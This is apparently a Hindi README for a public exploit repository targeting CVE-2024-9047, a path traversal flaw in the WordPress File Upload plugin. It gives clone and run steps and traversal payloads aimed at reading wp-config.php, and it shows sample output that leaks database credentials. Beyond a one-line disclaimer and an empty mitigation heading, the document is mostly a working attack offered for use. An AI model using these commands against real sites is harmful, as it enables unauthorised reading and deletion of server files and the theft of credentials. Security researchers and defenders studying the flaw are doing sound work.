
वर्डप्रेस फ़ाइल अपलोड प्लगइन के लिए एक्सप्लॉइट - 4.24.11 तक के सभी संस्करण असुरक्षित हैं।
वर्डप्रेस फ़ाइल अपलोड प्लगइन, WordPress के लिए, 4.24.11 तक (और इसमें शामिल) सभी संस्करणों में wfu_file_downloader.php फ़ाइल के माध्यम से पाथ ट्रैवर्सल भेद्यता के प्रति संवेदनशील है। यह भेद्यता अनधिकृत हमलावरों को इच्छित निर्देशिका के बाहर फ़ाइलों को पढ़ने या हटाने की अनुमति देती है। सफल शोषण के लिए लक्षित WordPress इंस्टॉलेशन पर PHP 7.4 या उससे पहले का संस्करण चल रहा होना आवश्यक है।
एक हमलावर इस भेद्यता का शोषण करने के लिए कमजोर एंडपॉइंट wfu_file_downloader.php पर एक विशिष्ट अनुरोध तैयार कर सकता है और सर्वर पर संवेदनशील फ़ाइलों तक अनधिकृत पहुंच प्राप्त करने के लिए फ़ाइल पथ पैरामीटर में हेरफेर कर सकता है।
4.24.11 या उससे पहले) स्थापित होना चाहिए।7.4 या उससे पहले चलना चाहिए।इस रिपॉजिटरी को क्लोन करें:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
Python निर्भरताएँ स्थापित करें (यदि आवश्यक हो):
pip install requests
प्लगइन संस्करण की जाँच करने और भेद्यता का शोषण करने के लिए स्क्रिप्ट चलाएँ:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
डिफ़ॉल्ट कमजोर कॉन्फ़िगरेशन का शोषण करने और WordPress कॉन्फ़िगरेशन फ़ाइल पढ़ने के लिए:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
अपनी WordPress साइट को सुरक्षित रखने के लिए:
यह कोड केवल शैक्षिक और शोध उद्देश्यों के लिए है। इस स्क्रिप्ट का अनधिकृत उपयोग उन सिस्टमों पर जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। लेखक इस कोड के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।